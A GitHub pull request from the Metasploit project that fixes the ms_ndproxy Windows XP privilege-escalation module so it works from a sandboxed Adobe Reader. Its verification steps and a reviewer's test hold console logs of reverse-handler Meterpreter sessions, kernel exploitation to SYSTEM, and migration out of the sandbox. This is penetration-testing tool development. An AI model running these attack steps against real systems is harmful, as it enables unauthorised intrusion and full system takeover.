Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix ms_ndproxy to work under a sandboxed Reader #2773

Merged
merged 3 commits into from Dec 17, 2013
Merged

Fix ms_ndproxy to work under a sandboxed Reader #2773

merged 3 commits into from Dec 17, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Short history, just learned from the malware in the wild how to CreateFile on a device to exploit ms_ndproxy under a sandboxed Reader.

Verification

  • Get a session from a sandboxed reader, using modules/exploits/windows/fileformat/reader_toolbutton for example. You shouldn't be able to migrate neither execute new processes:
msf exploit(handler) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 192.168.172.244
[*] Meterpreter session 4 opened (192.168.172.1:4444 -> 192.168.172.244:1042) at 2013-12-16 16:28:00 -0600

meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System                  4294967295                                 
 168   680   svchost.exe             4294967295                                 
 300   680   jqs.exe                 4294967295                                 
 404   680   alg.exe                 4294967295                                 
 560   4     smss.exe                4294967295                                 
 612   560   csrss.exe               4294967295                                 
 636   560   winlogon.exe            4294967295                                 
 680   636   services.exe            4294967295                                 
 692   636   lsass.exe               4294967295                                 
 804   680   vmtoolsd.exe            4294967295                                 
 848   680   vmacthlp.exe            4294967295                                 
 864   680   svchost.exe             4294967295                                 
 944   680   svchost.exe             4294967295                                 
 1036  680   svchost.exe             4294967295                                 
 1096  680   svchost.exe             4294967295                                 
 1332  680   svchost.exe             4294967295                                 
 1468  1448  explorer.exe            4294967295                                 
 1564  680   spoolsv.exe             4294967295                                 
 1780  1468  VMwareTray.exe          4294967295                                 
 1788  1468  vmtoolsd.exe            4294967295                                 
 1796  1800  jucheck.exe             4294967295                                 
 1800  1468  jusched.exe             4294967295                                 
 1812  1468  rundll32.exe            4294967295                                 
 1848  1468  ctfmon.exe              4294967295                                 
 2404  1468  cmd.exe                 4294967295                                 
 2472  1036  wscntfy.exe             4294967295                                 
 3140  1036  wuauclt.exe             4294967295                                 
 3260  1468  procexp.exe             4294967295                                 
 3320  864   wmiprvse.exe            4294967295                                 
 3488  1468  AcroRd32.exe            4294967295                                 
 3516  3488  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
  • Use the old exploits/windows/local/ms_ndproxy to elevate the session, should fail when trying to open the Device
  • Switch to this pull request. Use the new exploits/windows/local/ms_ndproxy to elevate the session, should work, even when it will elevate the process because the sandbox still prevents execution of new processes:
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 4
session => 4
msf exploit(ms_ndproxy) > rexploit
[*] Reloading module...

[*] Started reverse handler on 10.6.0.165:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
msf exploit(ms_ndproxy) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
  • Even when the elevated session is SYSTEM, the sandbox still prevents execution of new processes. But now you should be able to migrate and execute:
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0           NT AUTHORITY\SYSTEM            
 168   680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe
 3488  1468  AcroRd32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe
 3516  3488  AcroRd32.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe


meterpreter > execute -f c:\\windows\\system32\\calc.exe
[-] stdapi_sys_process_execute: Operation failed: Access is denied.
meterpreter > migrate 2404
[*] Migrating from 3516 to 2404...
[*] Migration completed successfully.
meterpreter > execute -f c:\\windows\\system32\\calc.exe
Process 2172 created.
meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session     User                           Path
 ---   ----  ----              ----  -------     ----                           ----
 0     0     [System Process]        4294967295                                 
 4     0     System            x86   0                                          
 168   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 300   680   jqs.exe           x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\Java\jre6\bin\jqs.exe
 404   680   alg.exe           x86   0                                          C:\WINDOWS\System32\alg.exe
 560   4     smss.exe          x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 612   560   csrss.exe         x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 636   560   winlogon.exe      x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 680   636   services.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 692   636   lsass.exe         x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 804   680   vmtoolsd.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 848   680   vmacthlp.exe      x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 864   680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 944   680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1036  680   svchost.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1096  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1332  680   svchost.exe       x86   0                                          C:\WINDOWS\system32\svchost.exe
 1468  1448  explorer.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\Explorer.EXE
 1564  680   spoolsv.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1780  1468  VMwareTray.exe    x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1788  1468  vmtoolsd.exe      x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1796  1800  jucheck.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jucheck.exe
 1800  1468  jusched.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Program Files\Common Files\Java\Java Update\jusched.exe
 1812  1468  rundll32.exe      x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\rundll32.exe
 1848  1468  ctfmon.exe        x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\ctfmon.exe
 2172  2404  calc.exe          x86   0           JUAN-C0DE875735\Administrator  c:\windows\system32\calc.exe
 2404  1468  cmd.exe           x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\cmd.exe
 2472  1036  wscntfy.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wscntfy.exe
 3140  1036  wuauclt.exe       x86   0           JUAN-C0DE875735\Administrator  C:\WINDOWS\system32\wuauclt.exe
 3260  1468  procexp.exe       x86   0           JUAN-C0DE875735\Administrator  C:\Documents and Settings\Administrator\Desktop\ProcessExplorer\procexp.exe
 3320  864   wmiprvse.exe      x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\wbem\wmiprvse.exe


meterpreter > exit
[*] Shutting down Meterpreter...

@kernelsmith
Copy link
Contributor

very interesting. Nice catch @jvazquez-r7 !
For the record, this msdn page http://msdn.microsoft.com/en-us/library/windows/desktop/aa363874(v=vs.85).aspx explains the sharemode being 0 a little bit (5th and 6th paragraphs).

@jvazquez-r7 "Unknown" is misspelled in the authors section. I would do a PR to your PR, but it doesn't seem worth the effort for such a cosita.

@wchen-r7
Copy link
Contributor 

msf exploit(handler) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Starting the payload handler...
[*] Sending stage (769024 bytes) to 10.0.1.76
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.76:59433) at 2013-12-16 20:27:58 -0600

meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/ms_ndproxy 
msf exploit(ms_ndproxy) > set session 1
session => 1
msf exploit(ms_ndproxy) > show options

Module options (exploit/windows/local/ms_ndproxy):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms_ndproxy) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Detecting the target system...
[*] Running against Windows XP SP3
[*] Checking device...
[+] \\.\NDProxy found!
[*] Disclosing the HalDispatchTable and hal!HaliQuerySystemInfo addresses...
[+] Addresses successfully disclosed.
[*] Storing the kernel stager on memory...
[+] Kernel stager successfully stored at 0x1000
[*] Storing the trampoline to the kernel stager on memory...
[+] Trampoline successfully stored at 0x1
[*] Storing the IO Control buffer on memory...
[+] IO Control buffer successfully stored at 0xd0d0000
[*] Triggering the vulnerability, corrupting the HalDispatchTable...
[*] Executing the Kernel Stager throw NtQueryIntervalProfile()...
[*] Checking privileges after exploitation...
[+] Exploitation successful! Creating a new process and launching payload...
[!] Unable to create a new process, maybe you're into a sandbox. If the current process has been elevated try to migrate before executing a new process...
msf exploit(ms_ndproxy) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Will fix the typo.

@wchen-r7
Copy link
Contributor

Never mind, juan fixed the typo. Merging.

wchen-r7 added a commit that referenced this pull request Dec 17, 2013
@wchen-r7
Land #2773 - Fix ms_ndproxy to work under a sandboxed Reader
ad2ec49
@wchen-r7 wchen-r7 merged commit 52cb43e into rapid7:master Dec 17, 2013
@jvazquez-r7 jvazquez-r7 deleted the fix_ndproxy branch November 18, 2014 15:47
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @kernelsmith @wchen-r7